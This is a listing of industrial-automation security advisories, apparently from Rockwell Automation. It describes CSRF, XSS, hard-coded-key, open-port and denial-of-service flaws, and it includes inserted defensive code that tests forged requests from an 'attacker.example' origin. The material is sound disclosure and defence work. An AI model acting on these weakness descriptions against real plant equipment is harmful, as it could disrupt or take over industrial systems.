The following Snort rules are intended to be run on a computer with network visibility of a ControlLogix communications module and can be used to detect traffic to a ControlLogix communications module that does not conform to the CIP specification as provided by ODVA (Open DeviceNet Vendors Association). While both the CIP Email and Socket Objects are capable of communicating over a network, they are intended to communicate over the backplane of a ControlLogix PLC (Programmable Logic Controller) and therefore should not be seen over the network. However, it is possible that site engineers could configure a communications module such that there is legitimate network traffic to and from CIP Email and Socket Objects, potentially resulting in false positives.

Snort 2 Rules and Snort 3 Rules are both attached below.

References

  • CVE-2023-3595 JSON
  • CVE-2023-3596 JSON
Attachments
  • CVE-2023-3595 Snort 2.rules
  • CVE-2023-3595 Snort 3.rules

Critical
PN1630 | PN1630 | Enhanced HIM Vulnerable to Cross Site Request Forgery Attack
Published Date:
July 11, 2023
Last Updated:
July 11, 2023
CVE IDs:
CVE-2023-2746
Products:
PowerFlex 7000, PowerFlex 6000
CVSS Scores:
9.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 - July 11, 2023

Affected Products

Affected Product | First Known in Firmware Revision | Corrected in Firmware Revision
Enhanced HIM | v1.001 | v1.002

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

CVE-2023-2746 IMPACT
The API that the application uses is not protected sufficiently and uses incorrect Cross-Origin Resource Sharing (CORS) settings and, as a result, is vulnerable to a Cross-Site Request Forgery (CSRF) attack. To exploit this vulnerability, a malicious user would have to convince a user to click on an untrusted link through a social engineering attack or successfully perform a Cross-Site Scripting (XSS) attack. Exploitation of a CSRF could potentially lead to sensitive information disclosure and full remote access to the affected products.

CVSS Base Score: 9.6/10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
CWE: CWE-352: Cross-Site Request Forgery (CSRF)


Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply risk mitigation, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the potential risk of the vulnerability.
  • Upgrade to version 1.002 which mitigates this issue.
  • QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

  • CVE-2023-2746 JSON

High
PN1631 | PN1631 | PowerMonitor™ 1000 – Cross-Site Scripting Vulnerability
Published Date:
July 11, 2023
Last Updated:
July 11, 2023
CVE IDs:
CVE-2023-2072
Products:
1408 PowerMonitor 1000
CVSS Scores:
8.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 – July 11, 2023

Affected Products

Affected Product | First Known in Software Revision | Corrected in Software Revision
PowerMonitor™ 1000 | V4.011 | V4.019

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

CVE-2023-2072 IMPACT
The PowerMonitor 1000 contains stored cross-site scripting vulnerabilities within the web pages of the product. The vulnerable pages do not require privileges to access and can be injected with code by an attacker, which could be used to leverage an attack on an authenticated user, resulting in remote code execution and potentially the complete loss of confidentiality, integrity, and availability of the product.

CVSS Base Score: 8.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-787 Out-Of-Bounds Write


Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigation below, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the potential risk of the vulnerability.
  • Upgrade to V4.019 which has been patched to mitigate these issues.
  • Additionally, we encourage the customer to implement our QA43240 - Recommended Security Guidelines from Rockwell Automation to minimize risk of the vulnerability.

Additional Resources

  • CVE-2023-2072 JSON

High
PN1627 | PN1627 | FactoryTalk® System Services affecting FactoryTalk® Policy Manager – Multiple Vulnerabilities
Published Date:
June 13, 2023
Last Updated:
June 13, 2023
CVE IDs:
CVE-2023-2639, CVE-2023-2637, CVE-2023-2638
Products:
FactoryTalk Policy Manager, FactoryTalk System Services, FactoryTalk Services Platform
CVSS Scores:
4.1, 5.9, 7.3
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 - June 13, 2023

Affected Products

Affected Product | First Known in Software Version | Corrected in Software Version
FactoryTalk® Services Platform* | 6.11.00 | 6.30.00
* Only if the following were installed:
  • FactoryTalk® Policy Manager v6.11.0
  • FactoryTalk® System Services v6.11.0

Vulnerability Details

Rockwell Automation received a report from Claroty regarding three vulnerabilities in FactoryTalk® System Services. If successfully exploited, these vulnerabilities may result in information disclosure, loading of malicious configuration files, or the elevation of privileges from a user to an administrator.

FactoryTalk® Policy Manager is dependent upon FactoryTalk® System Services and both components must be installed together. Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-2637  IMPACT
Hard-coded cryptographic key may lead to privilege escalation. FactoryTalk® System Services uses a hard-coded cryptographic key to generate administrator cookies. This vulnerability may allow a local, authenticated non-admin user to generate an invalid administrator cookie, giving them administrative privileges to the FactoryTalk® Policy Manager database. This may allow the threat actor to make malicious changes to the database that will be deployed when a legitimate FactoryTalk® Policy Manager user deploys a security policy model. User interaction is required for this vulnerability to be successfully exploited.

CVSS Base Score: 7.3
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:H
CWE: CWE-321: Use of Hard-coded Cryptographic Key


Known Exploited Vulnerability (KEV) database: No

CVE-2023-2638  IMPACT
Improper authorization in FTSSBackupRestore.exe may lead to the loading of malicious configuration archives. FactoryTalk® System Services does not verify that a backup configuration archive is password protected. This vulnerability may allow a local, authenticated non-admin user to craft a malicious backup archive, without password protection, that will be loaded by FactoryTalk® System Services as a valid backup when a restore procedure takes place. User interaction is required for this vulnerability to be successfully exploited.

CVSS Base Score: 5.9
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:H
CWE: CWE-287: Improper Authentication


Known Exploited Vulnerability (KEV) database: No

CVE-2023-2639  IMPACT
Origin validation error may lead to information disclosure. The underlying feedback mechanism of FactoryTalk® System Services that transfers the FactoryTalk® Policy Manager rules to relevant devices on the network does not verify that the origin of the communication is from a legitimate local client device. This may allow a threat actor to craft a malicious website that, when visited, will send a malicious script that can connect to the local WebSocket endpoint and wait for events as if it was a valid client device. If successfully exploited, this would allow a threat actor to receive information including whether FactoryTalk® Policy Manager is installed and potentially the entire security policy. User interaction is required for this vulnerability to be successfully exploited.

CVSS Base Score: 4.1
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N
CWE: CWE-346: Origin Validation Error


Known Exploited Vulnerability (KEV) database: No
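
The check whose absence this finding describes, as an added illustration (hypothetical code, not FactoryTalk's own): a loopback WebSocket endpoint that pushes policy events validates the handshake's Origin header against an exact allowlist before treating the connection as a legitimate local client. The allowed origins and the sample handshakes are constructed for the example.

```python
"""Origin validation for a loopback-only WebSocket endpoint.

Added illustration (hypothetical code, not FactoryTalk's own) of the check
whose absence CVE-2023-2639 describes: a local service that pushes policy
events over WebSocket must confirm the page opening the socket came from a
trusted local origin, not from an arbitrary website the user happened to visit.
"""
from typing import Mapping, Optional
from urllib.parse import urlsplit

# Assumed allowlist: origins the legitimate local client UI is served from.
ALLOWED_ORIGINS = frozenset({"https://localhost:8443", "https://127.0.0.1:8443"})


def normalize_origin(origin: str) -> Optional[str]:
    """Canonicalize an Origin value to scheme://host:port; None if malformed."""
    try:
        parts = urlsplit(origin.strip())
        port = parts.port  # raises ValueError for a non-numeric port
    except ValueError:
        return None
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    if parts.path or parts.query or parts.fragment:
        return None  # an Origin header never carries a path
    if port is None:
        port = 443 if parts.scheme == "https" else 80
    return f"{parts.scheme}://{parts.hostname}:{port}"


_ALLOWED = {normalize_origin(o) for o in ALLOWED_ORIGINS}


def websocket_origin_ok(headers: Mapping[str, str]) -> bool:
    """Accept a WebSocket upgrade only if Origin is present and allowlisted.

    Exact comparison of the normalized origin defeats look-alike hosts such as
    localhost.attacker.example; a missing Origin is rejected (fail closed),
    since browsers always send one on a WebSocket handshake."""
    hdrs = {k.lower(): v for k, v in headers.items()}
    if hdrs.get("upgrade", "").lower() != "websocket":
        return False
    origin = hdrs.get("origin")
    if origin is None:
        return False
    return normalize_origin(origin) in _ALLOWED


# Constructed handshakes: a legitimate local client and three that must fail.
SAMPLE_HANDSHAKES = {
    "local client": {"Upgrade": "websocket", "Origin": "https://localhost:8443"},
    "foreign site": {"Upgrade": "websocket", "Origin": "https://attacker.example"},
    "look-alike host": {"Upgrade": "websocket",
                        "Origin": "https://localhost.attacker.example:8443"},
    "no origin": {"Upgrade": "websocket"},
}


def evaluate_samples() -> dict:
    """Run every sample handshake through the check; True means accepted."""
    return {name: websocket_origin_ok(h) for name, h in SAMPLE_HANDSHAKES.items()}


if __name__ == "__main__":
    for name, ok in evaluate_samples().items():
        print(f"{name:16} -> {'accept' if ok else 'reject'}")
```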

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible.
  • Upgrade to 6.30.00 or later which has been patched to mitigate these issues.
  • For information on how to mitigate Security Risks on industrial automation control systems (IACS) networks see the following publications:
    • System Security Design Guidelines Reference Manual publication, SECURE-RM001
    • Configure System Security Features User Manual, SECURE-UM001
  • Additionally, we encourage the customer to implement our QA43240 - Recommended Security Guidelines from Rockwell Automation to minimize risk of the vulnerability.

Additional Resources

  • CVE-2023-2637 JSON
  • CVE-2023-2638 JSON
  • CVE-2023-2639 JSON

High
PN1628 | PN1628 | Apache Portable Runtime Vulnerability in FactoryTalk® Edge Gateway
Published Date:
June 13, 2023
Last Updated:
June 13, 2023
CVE IDs:
CVE-2021-35940, CVE-2017-12613
Products:
FactoryTalk Edge Gateway
CVSS Scores:
7.1
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 - June 13, 2023

Affected Products

Affected Product | First Known in Software Version | Corrected in Software Version
FactoryTalk® Edge Gateway | v1.03.00 | v1.04.00

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

CVE-2021-35940 IMPACT
An out of bounds array read vulnerability was fixed in the apr_time_exp*() function in the Apache Portable Runtime v1.6.3 (CVE-2017-12613). The fix for this issue was not carried forward to the APR 1.7.x branch, and hence version 1.7.0 regressed compared to 1.6.3 and is vulnerable to the same issue.

CVSS Base Score: 7.1
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H
CWE: CWE-125: Out-of-bounds Read


Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigation below, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.
  • Update to v1.04.00 which mitigates the issue.
  • QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

  • CVE-2021-35940 JSON

High
PN1629 | PN1629 | Denial-of-Service Vulnerability in FactoryTalk® Transaction Manager
Published Date:
June 13, 2023
Last Updated:
June 13, 2023
CVE IDs:
CVE-2023-2778
Products:
FactoryTalk Transaction Manager
CVSS Scores:
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 - June 13, 2023

Affected Products

Affected Product | First Known in Software Version | Corrected in Software Version
FactoryTalk® Transaction Manager | <=v13.10 | BF29042 - Patch: Multiple issues, FactoryTalk Transaction Manager 13.00/13.10

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

CVE-2023-2778 IMPACT
A denial-of-service (DoS) vulnerability exists in the affected products. This vulnerability can be exploited by sending a modified packet to port 400. If exploited, the application could potentially crash or experience a high CPU or memory usage condition, causing intermittent application functionality issues. The application would need to be restarted to recover from the DoS.

CVSS Base Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE: CWE-400: Uncontrolled Resource Consumption


Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations below, if possible. Additionally, we encourage our customers to implement our suggested security best practices to minimize the risk of the vulnerability.
  • Customers should follow the instructions in BF29042 - Patch: Multiple issues, FactoryTalk Transaction Manager 13.00/13.10 to install the patch to mitigate the issue.
  • QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

  • CVE-2023-2778 JSON

High
PN1625 | PN1625 | Inadequate Encryption Vulnerability in ThinManager®
Published Date:
May 12, 2023
Last Updated:
May 12, 2023
CVE IDs:
CVE-2023-2443
Products:
ThinManager
CVSS Scores:
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
2.0
Revision History
Version 1.0 - May 11, 2023
Version 2.0 - May 12, 2023 – Updated First Known in Software Version

Affected Products

Affected Product | First Known in Software Version | Corrected in Software Version
ThinManager® | v13.0.0 and v13.0.1 | v13.0.2

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-2443 IMPACT
The affected product allows use of medium strength ciphers. If the client requests an insecure cipher, a malicious actor could potentially decrypt traffic sent between the client and server API.

CVSS Base Score: 7.5/10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CWE: Inadequate Encryption Strength


Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize risk of vulnerability.
  • Upgrade to v13.0.2.
  • Do not use 3DES encryption algorithm.
  • QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

  • CVE-2023-2443 JSON
  • QA60051 - ThinManager : Download Patches and Updates
  • QA66518 - ThinManager: How to Ensure 3DES Encryption Algorithm is Not Used

High
PN1622 | PN1622 | ArmorStart® ST 281E, 284EE Vulnerable to Multiple XSS Vulnerabilities
Published Date:
May 11, 2023
Last Updated:
May 11, 2023
CVE IDs:
CVE-2023-29030, CVE-2023-29022, CVE-2023-29028, CVE-2023-29027, CVE-2023-29023, CVE-2023-29026, CVE-2023-29029, CVE-2023-29031, CVE-2023-29024, CVE-2023-29025
Products:
ArmorStart
CVSS Scores:
4.7, 7.0, 5.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 - May 11, 2023

Affected Products

Affected Product | First Known in Firmware Revision | Corrected in Firmware Revision
ArmorStart® ST 281E | v2.004.06 | N/A
ArmorStart® ST 284E | all | N/A
ArmorStart® ST 280E | all | N/A

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-29031 IMPACT
A cross site scripting vulnerability was discovered that could potentially allow a malicious user to view and modify sensitive data or make the web page unavailable. User interaction, such as a phishing attack, is required for successful exploitation of this vulnerability.

CVSS Base Score: 7.0
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-20 Improper Input Validation


Known Exploited Vulnerability (KEV) database: No

CVE-2023-29030 IMPACT
A cross site scripting vulnerability was discovered that could potentially allow a malicious user to view and modify sensitive data or make the web page unavailable. User interaction, such as a phishing attack, is required for successful exploitation of this vulnerability.

CVSS Base Score: 7.0 (High)
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-20 Improper Input Validation


Known Exploited Vulnerability (KEV) database: No

CVE-2023-29023 IMPACT
A cross site scripting vulnerability was discovered that could potentially allow a malicious user to view and modify sensitive data or make the web page unavailable. User interaction, such as a phishing attack, is required for successful exploitation of this vulnerability.

CVSS Base Score: 7.0 (High)
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-20 Improper Input Validation


Known Exploited Vulnerability (KEV) database: No

CVE-2023-29024 IMPACT
A cross site scripting vulnerability was discovered that could potentially allow a malicious user to view and modify sensitive data or make the web page unavailable. User interaction, such as a phishing attack, is required for successful exploitation of this vulnerability.

CVSS Base Score: 5.5 (Medium)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L
CWE: CWE-20 Improper Input Validation


Known Exploited Vulnerability (KEV) database: No

CVE-2023-29025 IMPACT
A cross site scripting vulnerability was discovered that could potentially allow a malicious user with admin privileges and network access to view user data and modify the web interface. Additionally, a malicious user could potentially cause interruptions to the availability of the web page.

CVSS Base Score: 4.7 (Medium)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
CWE: CWE-20 Improper Input Validation


CVE-2023-29026 IMPACT
A cross site scripting vulnerability was discovered that could potentially allow a malicious user with admin privileges and network access to view user data and modify the web interface. Additionally, a malicious user could potentially cause interruptions to the availability of the web page.

CVSS Base Score: 4.7 (Medium)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
CWE: CWE-20 Improper Input Validation


CVE-2023-29027 IMPACT
A cross site scripting vulnerability was discovered that could potentially allow a malicious user with admin privileges and network access to view user data and modify the web interface. Additionally, a malicious user could potentially cause interruptions to the availability of the web page.

CVSS Base Score: 4.7 (Medium)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
CWE: CWE-20 Improper Input Validation


CVE-2023-29028 IMPACT
A cross site scripting vulnerability was discovered that could potentially allow a malicious user with admin privileges and network access to view user data and modify the web interface. Additionally, a malicious user could potentially cause interruptions to the availability of the web page.

CVSS Base Score: 4.7 (Medium)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
CWE: CWE-20 Improper Input Validation


CVE-2023-29029 IMPACT
A cross site scripting vulnerability was discovered that could potentially allow a malicious user with admin privileges and network access to view user data and modify the web interface. Additionally, a malicious user could potentially cause interruptions to the availability of the web page.

CVSS Base Score: 4.7 (Medium)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
CWE: CWE-20 Improper Input Validation


CVE-2023-29022 IMPACT
A cross site scripting vulnerability was discovered that could potentially allow a malicious user with admin privileges and network access to view user data and modify the web interface. Additionally, a malicious user could potentially cause interruptions to the availability of the web page.

CVSS Base Score: 4.7 (Medium)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
CWE: CWE-20 Improper Input Validation



Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible.
  • Disable the webserver during normal use. The webserver is disabled by default and should only be enabled to modify configurations. After modifying configurations, the web server should be disabled.
  • For information on how to mitigate Security Risks on industrial automation control systems (IACS) networks see the following publications:
    • System Security Design Guidelines Reference Manual publication, SECURE-RM001
    • Configure System Security Features User Manual, SECURE-UM001
  • Additionally, we encourage customers to implement our QA43240 - Recommended Security Guidelines from Rockwell Automation to minimize the risk of the vulnerability.

Additional Resources

  • CVE-2023-29022 JSON
  • CVE-2023-29023 JSON
  • CVE-2023-29024 JSON
  • CVE-2023-29025 JSON
  • CVE-2023-29026 JSON
  • CVE-2023-29027 JSON
  • CVE-2023-29028 JSON
  • CVE-2023-29029 JSON
  • CVE-2023-29030 JSON
  • CVE-2023-29031 JSON

Critical
PN1623 | PanelView™ 800 – Remote Code Execution Vulnerabilities
Published Date:
May 11, 2023
Last Updated:
May 11, 2023
CVE IDs:
CVE-2019-16748, CVE-2020-36177
Products:
PanelView 800
CVSS Scores:
9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 - May 11, 2023

Affected Products

Affected Product | First Known in Software Version | Corrected in Software Version
PanelView™ 800 - 2711R-T4T | V5.011 | V8.011
PanelView™ 800 - 2711R-T7T | V5.011 | V8.011
PanelView™ 800 - 2711R-T10T | V5.011 | V8.011

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2020-36177 IMPACT
RsaPad_PSS in wolfSSL before 4.6.0 has an out-of-bounds write for certain relationships between key size and digest size. wolfSSL is used in the PanelView™ 800, and an attacker could trigger a heap buffer overflow if the user has the email feature enabled in the project file where wolfSSL is used. This feature is disabled by default.

CVSS Base Score: 9.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-787 Out-Of-Bounds Write


Known Exploited Vulnerability (KEV) database: No

CVE-2019-16748 IMPACT
In wolfSSL through 4.1.0, there is a missing sanity check of memory accesses when parsing ASN.1 certificate data during the handshake. Specifically, there is a one-byte heap-based buffer over-read in CheckCertSignature_ex in wolfcrypt/src/asn.c. wolfSSL is used in the PanelView™ 800, and an attacker could trigger the over-read if the user has the email feature enabled in the project file where wolfSSL is used. This feature is disabled by default.

CVSS Base Score: 9.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Note: the published score and vector disagree. The vector as printed evaluates to 7.8 under CVSS v3.1; a 9.8 with S:U and C:H/I:H/A:H requires AV:N/AC:L/PR:N/UI:N, as in the CVE-2020-36177 vector above. The advisory header lists 9.8 for both CVEs.
CWE: CWE-125 Out-Of-Bounds Read


Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible.
  • Upgrade to V8.011 which has been patched to mitigate these issues.
  • Ensure that the email feature is disabled (This is disabled by default).
  • For information on how to mitigate Security Risks on industrial automation control systems (IACS) networks see the following publications:
    • System Security Design Guidelines Reference Manual publication, SECURE-RM001
    • Configure System Security Features User Manual, SECURE-UM001
  • Additionally, we encourage customers to implement our QA43240 - Recommended Security Guidelines from Rockwell Automation to minimize the risk of the vulnerability.

Additional Resources

  • CVE-2020-36177 JSON
  • CVE-2019-16748 JSON

High
PN1626 | Cross Site Request Forgery in FactoryTalk® Vantagepoint®
Published Date:
May 11, 2023
Last Updated:
May 11, 2023
CVE IDs:
CVE-2023-2444
Products:
FactoryTalk VantagePoint
CVSS Scores:
7.1
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 - May 11, 2023

Affected Products

Affected Product | First Known in Software Version | Corrected in Software Version
FactoryTalk® Vantagepoint® | < V8.40 | V8.40 and later

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-2444 IMPACT
A cross site request forgery vulnerability exists in the affected product. This vulnerability can be exploited in two ways. If an attacker sends a malicious link to a computer that is on the same domain as the FactoryTalk® Vantagepoint® server and a user clicks the link, the attacker could impersonate the legitimate user and send requests to the affected product.

Additionally, if an attacker sends an untrusted link to a computer that is not on the same domain as the server and a user opens the FactoryTalk® Vantagepoint® website, enters credentials for the FactoryTalk® Vantagepoint® server, and clicks on the malicious link a cross site request forgery attack would be successful as well.

CVSS Base Score: 7.1/10
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:H/A:H
CWE: CWE-345 Insufficient Verification of Data Authenticity


Known Exploited Vulnerability (KEV) database: No
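The two paths described above reduce to the same condition: the victim's browser holds a valid session cookie for the server when it follows the attacker's link, and the server accepts any request that carries that cookie. The model below is an added illustration, not FactoryTalk VantagePoint code; the class names, the `csrf_token` form field and the hostnames `vantagepoint.example` and `attacker.example` are hypothetical. It runs the forged and the legitimate request against a server with and without the per-session synchronizer token plus Origin check.

```python
"""Model of the cross-site request forgery paths described for
CVE-2023-2444 and of the server-side check that stops them.
Added illustration: not FactoryTalk VantagePoint code; all names are
hypothetical."""
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class Request:
    """Minimal request model. The browser attaches cookies automatically to
    any request aimed at the server's origin, so a page the attacker
    controls can choose method, path and form fields but can neither read
    nor forge the session cookie; it can only cause it to be sent."""
    method: str
    path: str
    cookies: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)


class Server:
    def __init__(self, origin, require_token):
        self.origin = origin                  # e.g. "https://vantagepoint.example"
        self.require_token = require_token    # False models the vulnerable build
        self.sessions = {}                    # session id -> (user, csrf token)
        self.actions = []                     # state-changing requests accepted

    def login(self, user):
        sid = secrets.token_urlsafe(16)
        token = secrets.token_urlsafe(32)     # per-session synchronizer token
        self.sessions[sid] = (user, token)
        return sid, token

    def handle(self, req):
        session = self.sessions.get(req.cookies.get("session"))
        if session is None:
            return 401
        user, token = session
        if req.method == "POST" and self.require_token:
            # The token is embedded in pages we served to the logged-in user;
            # a cross-site page cannot read it, so a forged request lacks it.
            if not hmac.compare_digest(req.form.get("csrf_token", ""), token):
                return 403
            # Browsers set Origin on cross-site POSTs; reject foreign origins.
            origin = req.headers.get("Origin")
            if origin is not None and origin != self.origin:
                return 403
        self.actions.append((user, req.path, dict(req.form)))
        return 200


def forged_request(sid):
    """What reaches the server when the logged-in victim follows the
    attacker's link: the session cookie rides along, the token does not."""
    return Request("POST", "/api/settings", cookies={"session": sid},
                   form={"setting": "attacker-value"},
                   headers={"Origin": "https://attacker.example"})


def legitimate_request(sid, token):
    return Request("POST", "/api/settings", cookies={"session": sid},
                   form={"setting": "operator-value", "csrf_token": token},
                   headers={"Origin": "https://vantagepoint.example"})


def run_scenario(require_token):
    """Path 1 (user already logged in) and path 2 (user receives the link,
    logs in, then clicks it) both end here: the link is opened while a valid
    session cookie exists. Returns the status codes the forged and the
    legitimate request receive."""
    srv = Server("https://vantagepoint.example", require_token)
    sid, token = srv.login("operator")          # user logs in
    forged = srv.handle(forged_request(sid))    # user clicks the attacker's link
    legit = srv.handle(legitimate_request(sid, token))
    return forged, legit


if __name__ == "__main__":
    print("vulnerable (forged, legitimate):", run_scenario(require_token=False))
    print("hardened  (forged, legitimate):", run_scenario(require_token=True))
```

The session cookie alone proves nothing about who composed the request; the token does, because only a page served from the application's own origin can carry it. The Origin comparison is a second, independent signal and is deliberately skipped when the header is absent, since some same-origin navigations omit it.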

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are also encouraged to implement our suggested security best practices to minimize risk associated with the vulnerability.
  • Provide training about social engineering attacks, such as phishing.
  • QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

  • CVE-2023-2444 JSON

Critical
PN1624 | Open Ports Vulnerability in Kinetix 5500 EtherNet/IP Servo Drive
Published Date:
May 11, 2023
Last Updated:
October 16, 2024
CVE IDs:
CVE-2023-1834
Products:
2198 Kinetix 5500 Drive
CVSS Scores (v3.1):
9.4
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 - May 11, 2023

Affected Products

Affected Product | First Known in Firmware Revision | Corrected in Firmware Revision
Kinetix 5500 manufactured between May 2022 and January 2023* | v7.13 | v7.14 or later. Customers should upgrade to v7.14 or later, which closes the ports and mitigates this issue.

*The manufacturing date of the drive is stated on the product label.

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-1834 IMPACT
Rockwell Automation was made aware that Kinetix® 5500 drives manufactured between May 2022 and January 2023 and running firmware v7.13 may have the Telnet and FTP ports open by default.

CVSS Base Score: 9.4/10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H
CWE: CWE-284 Improper Access Control


Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected drives are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.
  • Upgrade to v7.14
  • QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

  • CVE-2023-1834 JSON

High
PN1621 | Arena® Simulation – Multiple Vulnerabilities
Published Date:
May 09, 2023
Last Updated:
May 09, 2023
CVE IDs:
CVE-2023-29460, CVE-2023-29462, CVE-2023-29461
Products:
Arena
CVSS Scores:
7.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 - May 9, 2023

Affected Products

Affected Product | First Known in Software Version | Corrected in Software Version
